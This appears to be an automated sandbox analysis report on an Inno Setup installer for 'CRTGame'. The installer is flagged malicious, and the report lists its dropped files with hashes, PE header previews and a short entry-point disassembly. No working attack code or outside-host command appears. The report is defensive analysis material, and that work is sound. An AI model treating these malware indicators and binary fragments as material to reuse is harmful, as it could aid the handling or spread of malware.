                                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1825
                                                                                                          Entropy (8bit):5.088030483893024
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                          Malicious:false
                                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:IFF data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1716
                                                                                                          Entropy (8bit):4.781797138644031
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                                          Malicious:false
                                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1825
                                                                                                          Entropy (8bit):5.088030483893024
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                          Malicious:false
                                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:IFF data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1716
                                                                                                          Entropy (8bit):4.781797138644031
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                                          MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                                          SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                                          SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                                          SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                                          Malicious:false
                                                                                                          Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1825
                                                                                                          Entropy (8bit):5.088030483893024
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
                                                                                                          MD5:992C00BEAB194CE392117BB419F53051
                                                                                                          SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
                                                                                                          SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
                                                                                                          SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
                                                                                                          Malicious:false
                                                                                                          Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):714526
                                                                                                          Entropy (8bit):6.5053900039496435
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                                          MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                                          SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                                          SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                                          SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                                          Malicious:false
                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:InnoSetup Log CRTGame, version 0x30, 8020 bytes, 123991\user, "C:\Program Files (x86)\CRTGame"
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8020
                                                                                                          Entropy (8bit):5.054219724696777
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:93N8WVPpvzbK+T4hlOIhlXWx4cVSQs0Ln9qE2VYW4P:998WVPpvd+QIhs+cVSQ1nEmd
                                                                                                          MD5:1173714B5C34DCF2100593A45F883F53
                                                                                                          SHA1:323517FBD4C6A68A28352A48FD60CA1EE5113F8B
                                                                                                          SHA-256:9DAF91B8D8AF732EB5DE9A0CC9D713D510103B82D16284FE8FC611BD387FC24F
                                                                                                          SHA-512:F729048FCE42BE78E8674AEC9681EFD434999FE1D726CBEDD04A8C1DD20CCF5A194DFD8782D0B135FF1CA9411BCF61E387BB8AB51CA1A263C054D065A31044A8
                                                                                                          Malicious:false
                                                                                                          Preview:Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...T...%...............................................................................................................>7.?................>....123991.user.C:\Program Files (x86)\CRTGame...........4...u.. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemMetr
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):714526
                                                                                                          Entropy (8bit):6.5053900039496435
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
                                                                                                          MD5:3910EA485B6F67ECAF6B34DDB4BE5980
                                                                                                          SHA1:85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
                                                                                                          SHA-256:FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
                                                                                                          SHA-512:65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
                                                                                                          Malicious:false
                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2195454
                                                                                                          Entropy (8bit):6.3391537227636
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:t70DabqUrOqdUU0FHR7F6RqubHsDoi1zTVYc60ra89K/UQOh/dYzIpnHq9jFHs0n:t70DBUrBUUS7ERqLXuHpAir
                                                                                                          MD5:A158C99AA92F0E29ED84BB25976D4F7A
                                                                                                          SHA1:165831B30EC9EA08FA80E348AE1A522256A633BD
                                                                                                          SHA-256:D038C11B0567EE81823A93BD8A1CC62F176AC7CE785104E7B08954B1B3D80FA4
                                                                                                          SHA-512:DCCF5785BA72C46CD38766610341CCC1DF2CB4C98F2C475105B06CEAE461BD109974D3B9D8DE945619B7ACFA88A85082C6EF239D7E074511B411A3706521A170
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .ve.................0...................@....@...........................!......."......................................I..P........G...........................................................................@...............................text....+.......0.................. ..`.rdata.......@... ...@..............@..@.data....P...`...0...`..............@....rsrc....G.......P..................@..@.hsave..............................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4
                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:2:2
                                                                                                          MD5:7303F017FE369F9CE5AF630DA93BA867
                                                                                                          SHA1:2F086FC767A0DAC59A38C67F409B4F74A1EAB39F
                                                                                                          SHA-256:E8613F5A5BC9F9FEEDA32A8E7C80B69DD4878E47B6A91723FB15EB84236B6A2B
                                                                                                          SHA-512:041565F019C723420925EEADBCAFD2D4FAB8AA4DB491542298E8936A9BCFDB4FC925EA181E3C8754A4E07685A1C94C955E9041C66348B73ED5720A9BC5B21460
                                                                                                          Malicious:false
                                                                                                          Preview:....
                                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):128
                                                                                                          Entropy (8bit):2.862976125752538
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                                                          MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                                                          SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                                                          SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                                                          SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                                                          Malicious:false
                                                                                                          Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8
                                                                                                          Entropy (8bit):2.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:8ml/:pl/
                                                                                                          MD5:CFC9B8231876E8F68F615F22F94F725A
                                                                                                          SHA1:5128193DFBC136568DFC71E319B6C2757CEF1739
                                                                                                          SHA-256:B643FF979737794088830076F5B3CE794B819DB2A8E0E8F4363641E3596DF1AC
                                                                                                          SHA-512:A37F83A9CCC489011351EB16124431F5C770281DE1EBFB72BFCEE1E4039FCB00B738C7076CD5BFB68E454F98F2B381546E954528F833E1639BB15DF436D225A1
                                                                                                          Malicious:false
                                                                                                          Preview:a.^g....
                                                                                                          Process:C:\Users\user\Desktop\Mg5bMQ2lWi.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):704000
                                                                                                          Entropy (8bit):6.4972640482038075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
                                                                                                          MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
                                                                                                          SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
                                                                                                          SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
                                                                                                          SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
                                                                                                          Malicious:true
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4096
                                                                                                          Entropy (8bit):4.026670007889822
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19456
                                                                                                          Entropy (8bit):5.8975201046735535
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                                                          MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                                                          SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                                                          SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                                                          SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6144
                                                                                                          Entropy (8bit):4.215994423157539
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23312
                                                                                                          Entropy (8bit):4.596242908851566
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):7.999426147061674
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          File name:Mg5bMQ2lWi.exe
                                                                                                          File size:7'240'000 bytes
                                                                                                          MD5:7700eba1ceaa134b1da16d1ede0e7894
                                                                                                          SHA1:d591222916193a3bcaef009eae37fc60acbff924
                                                                                                          SHA256:87324fceb64682470429276f1766671ad250163a2404b7b7df6f4d25007a1df0
                                                                                                          SHA512:571691b0c5af9d912814de97e0db6523a2d7ea73e0ad6ff128f0e16d1d3d724df370bb856f1f59cf09145963c0fe7f2d1ee6dc3453e3ce39a567a14724c3c9e0
                                                                                                          SSDEEP:98304:w+koiRLFdsODKUdFxQ8k618KzAYYC9z3Bbgtev25o40nsZJjNw5MQNiEU4P5EKHl:xz25G6bV1yYDuZxCWQNhUU2uNzj
                                                                                                          TLSH:997633109166CC3FC4B3DDF1ACAB700611DD7C652D368BED982DDA4E17ABC72191C5A8
                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                          Icon Hash:2d2e3797b32b2b99
                                                                                                          Entrypoint:0x409c40
                                                                                                          Entrypoint Section:CODE
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x65765E41 [Mon Dec 11 00:56:33 2023 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:1
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:1
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:1
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          add esp, FFFFFFC4h
                                                                                                          push ebx
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          xor eax, eax
                                                                                                          mov dword ptr [ebp-10h], eax
                                                                                                          mov dword ptr [ebp-24h], eax
                                                                                                          call 00007F5AE8DC266Bh
                                                                                                          call 00007F5AE8DC3872h
                                                                                                          call 00007F5AE8DC3B01h
                                                                                                          call 00007F5AE8DC5B38h
                                                                                                          call 00007F5AE8DC5B7Fh
                                                                                                          call 00007F5AE8DC84AEh
                                                                                                          call 00007F5AE8DC8615h
                                                                                                          xor eax, eax
                                                                                                          push ebp
                                                                                                          push 0040A2FCh
                                                                                                          push dword ptr fs:[eax]
                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                          xor edx, edx
                                                                                                          push ebp
